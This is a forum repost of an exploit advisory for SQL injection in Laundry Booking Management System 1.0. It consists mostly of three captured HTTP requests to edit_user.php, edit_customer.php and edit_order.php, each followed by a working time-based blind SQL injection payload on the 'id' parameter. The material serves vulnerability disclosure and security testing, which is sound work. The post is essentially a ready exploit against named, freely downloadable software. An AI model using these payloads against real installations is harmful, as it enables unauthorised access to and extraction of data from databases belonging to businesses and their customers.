Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Laundry Booking Management System 1.0 - 'Multiple' SQL Injection

 Share


HACK1949

Recommended Posts

# Exploit Title: Laundry Booking Management System 1.0 - 'Multiple' SQL Injection
# Date: 2021-08-19
# Exploit Author: Azumah Foresight Xorlali
# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14400&title=Laundry+Booking+Management+System+in+PHP+with+Free+Source+Code
# Version: Version 1.0
# Category: Web Application
# Tested on: Kali Linux

Description:
Laundry Booking Management System 1.0 application is vulnerable to SQL
injection via the "id" parameter, which was not properly checked on the
[edit_user.php,edit_customer.php,edit_order.php] page.

#Vulnerable Request when logged in as a user with Supervisor or Manager:
POST /laundry_sourcecode/laundry_sourcecode/edit_user.php?id=7 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/laundry_sourcecode/laundry_sourcecode/edit_user.php?id=7
Content-Type: multipart/form-data;
boundary=---------------------------851226474159708868105526498
Content-Length: 1408
Connection: close
Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r
Upgrade-Insecure-Requests: 1


---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=7' AND (SELECT 5999 FROM (SELECT(SLEEP(5)))BOpa) AND
'voSh'='voSh
---

-----------------------------------------------------------------------------------------------------------------------


#Vulnerable Request when logged in as Admin:
POST /laundry_sourcecode/laundry_sourcecode/edit_customer.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/laundry_sourcecode/laundry_sourcecode/edit_customer.php?id=1
Content-Type: multipart/form-data;
boundary=---------------------------17781030011592905058578147050
Content-Length: 767
Connection: close
Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r
Upgrade-Insecure-Requests: 1

---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 6874 FROM (SELECT(SLEEP(5)))ZCjC) AND
'GIau'='GIau
---

-----------------------------------------------------------------------------------------------------------------------

#Vulnerable Request when logged in a Admin:
POST /laundry_sourcecode/laundry_sourcecode/edit_order.php?id=18 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/laundry_sourcecode/laundry_sourcecode/edit_order.php?id=18
Content-Type: multipart/form-data;
boundary=---------------------------167059892515401580571429373524
Content-Length: 886
Connection: close
Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r
Upgrade-Insecure-Requests: 1


---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=18' AND (SELECT 8201 FROM (SELECT(SLEEP(5)))odDG) AND
'wCli'='wCli
---
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...